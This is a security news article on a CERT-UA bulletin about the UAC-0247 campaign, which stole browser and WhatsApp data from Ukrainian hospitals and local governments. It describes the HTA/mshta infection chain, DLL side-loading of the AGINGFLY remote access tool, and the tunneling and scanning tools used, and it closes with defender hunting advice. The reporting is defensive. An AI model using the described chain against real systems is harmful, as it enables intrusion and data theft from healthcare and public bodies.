New UAC-0247 campaign steals browser and WhatsApp data from hospitals and governments

A new cyber campaign tied to the UAC-0247 threat cluster has targeted Ukrainian local governments and municipal healthcare organizations, including clinics and emergency hospitals. The operation focused on stealing data from Chromium-based browsers and WhatsApp, while also giving attackers room to move deeper into compromised networks.

The activity took place during March and April 2026, according to CERT-UA. Ukraine’s incident responders said the same cluster also appeared in attacks involving FPV drone operators, which suggests the campaign reached beyond civilian institutions and into sectors with direct wartime relevance.

BEST SPRING 2026 DEALS

Editor's Choice

Private Internet Access

Access content across the globe at the highest speed rate.

70% of our readers choose Private Internet Access

70% of our readers choose ExpressVPN

ExpressVPN

Browse the web from multiple devices with industry-standard security protocols.

Nord VPN

Faster dedicated servers for specific actions (currently at summer discounts)

The entry point was simple. Victims received emails framed as humanitarian aid discussions and were pushed to click a link that either led to an AI-built fake site or to a legitimate site abused through a cross-site scripting flaw. From there, the victim downloaded an archive that started the infection chain.

How the infection chain works

Once the archive was opened, a shortcut file launched the Windows HTA handler through mshta.exe, pulled a remote HTA file, and showed a decoy form while a background task dropped and ran the real payload. CERT-UA also described recent cases that used a two-stage loader, with the final payload compressed and encrypted before execution.

One confirmed case on March 10 used Signal to distribute a file named bachu.zip, which pretended to be an updated version of the BACHU software tool used by FPV operators. CERT-UA said the archive actually contained a DLL that launched AGINGFLY through DLL side-loading as soon as the main executable ran.

The campaign did more than steal files. CERT-UA linked UAC-0247 to CHROMELEVATOR for browser credential theft, ZAPIXDESK for WhatsApp theft, RUSTSCAN for internal network mapping, LIGOLO-NG and CHISEL for covert tunnels, and in one case an XMRIG miner loaded through a modified WireGuard program.

What AGINGFLY gives attackers

AGINGFLY appears to be the main remote access malware in this campaign. Reporting tied to the CERT-UA bulletin says it is written in C# and supports remote command execution, file download, screenshot capture, keylogging, and in-memory code execution, which gives operators both theft and long-term access.

A notable detail is how the malware extends itself after infection. Instead of carrying every command handler inside the main implant, AGINGFLY can fetch source code from its command server and compile that code directly on the infected machine, which gives the operators flexibility without constantly replacing the core malware.

Persistence also matters here. CERT-UA said the attackers used a PowerShell script called SILENTLOOP to run commands, refresh configuration, and pull updated command-and-control server addresses from a Telegram channel, while earlier-stage access could rely on a TCP reverse shell or RAVENSHELL with XOR-encrypted traffic.

Key technical elements at a glance

The bigger issue is not just data theft. This campaign combines phishing, living-off-the-land execution, remote access, lateral movement, and persistence in one chain, which makes it dangerous for hospitals and public institutions that often rely on mixed software estates and limited security staff.

CERT-UA’s advice is direct. Organizations should restrict the execution of LNK, HTA, and JS files, and they should limit or closely control utilities such as mshta.exe, powershell.exe, and wscript.exe, because attackers keep abusing them to blend into normal Windows activity. Microsoft’s own Defender guidance supports that approach through attack surface reduction rules and application control policies aimed at risky script and executable behavior.

What defenders should do now

• Block or tightly restrict LNK, HTA, and JS execution where business operations allow it.
• Review and control the use of mshta.exe, powershell.exe, wscript.exe, and similar script-capable utilities.
• Hunt for unusual scheduled tasks, remote HTA retrieval, and outbound connections to newly observed IP addresses.
• Check endpoints for credential theft from Chromium browsers and for suspicious access to WhatsApp desktop data stores.
• Look for network scanning and tunneling activity tied to RUSTSCAN, LIGOLO-NG, and CHISEL.

FAQ